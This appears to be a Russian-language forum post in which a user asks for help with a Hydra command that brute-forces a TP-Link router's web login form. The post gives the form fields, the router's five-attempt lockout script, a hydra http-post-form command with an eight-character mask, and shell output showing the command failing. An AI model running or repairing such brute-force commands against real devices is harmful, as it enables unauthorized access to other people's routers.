Брутфорс атака роутера через hydra - скрипт к tp-link

[gogogordy]

всем добрый день!

пытаюсь написать скрипт для гидры, чтоб зайдти в роутер с известным мне логином и поролем:

логин: admin пароль: 11112222

данные метода POST: 192.168.1.1:80

реквест URL:

Ссылка скрыта от гостей

локация:

Ссылка скрыта от гостей

form data: data = { 'tipsFlag': '0', 'timevalue': '0', 'Login_Name': username, 'Login_Pwd': 'Ha2S+eOKqmzA6nrlmTeh7w==', 'uiWebLoginhiddenUsername': usernameHash, 'uiWebLoginhiddenPassword': passwordHash }

после 5 неудачь - нельзя вводить на протяжении 600 секунд.

var timelast = 0; function IncreaseSec() { if(timelast <= 2) window.setTimeout(«window.location.reload(true);», 1000); timelast = timelast -1; var infoStr2='You have exceeded five attempts, please try again in'; infoStr2=infoStr2+' '+timelast+«s.»; document.getElementById(«tr1»).innerHTML = infoStr2; }

-----------------------------

вот скрипт который я написал чтоб проверить результат, но он работать не хочет =(((

hydra -f -l admin -x 8:8:a1 -V 192.168.1.1 http-post-form «/login_security.html/Forms/login_security_1:tipsFlag=0&timevalue=0&Login_Name=^USER^&Login_Pwd=^PASS^&uiWebLoginhiddenUsername=^USER^&uiWebLoginhiddenPassword=^PASS^:bad»


[6] 18416
[7] 18417
[8] 18418
[9] 18419
[10] 18420
[2] Завершён timevalue=0
[5] Завершён uiWebLoginhiddenUsername=^USER^
[7] Завершён timevalue=0
[9]- Завершён Login_Pwd=^PASS^
root@11111:~# Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( link removed) starting at 2017-11-25 08:41:18 [ERROR] optional parameter must start with a '/' slash!

[6] Выход 255 hydra -f -l admin -x 8:8:a1 -V 192.168.1.1 http-post-form «/login_security.html/Forms/login_security_1:tipsFlag=0
[8]- Завершён Login_Name=^USER^
[10]+ Завершён uiWebLoginhiddenUsername=^USER^

вот, я, измучаный, сюда и отписался ^^" - помогите плииз!!